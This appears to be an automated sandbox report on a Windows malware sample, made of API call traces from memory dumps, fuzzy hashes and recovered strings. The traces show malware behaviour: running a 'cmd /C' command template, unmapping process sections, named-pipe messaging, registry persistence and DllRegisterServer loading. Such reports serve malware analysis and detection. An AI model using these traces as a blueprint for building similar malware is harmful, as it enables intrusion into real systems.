    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
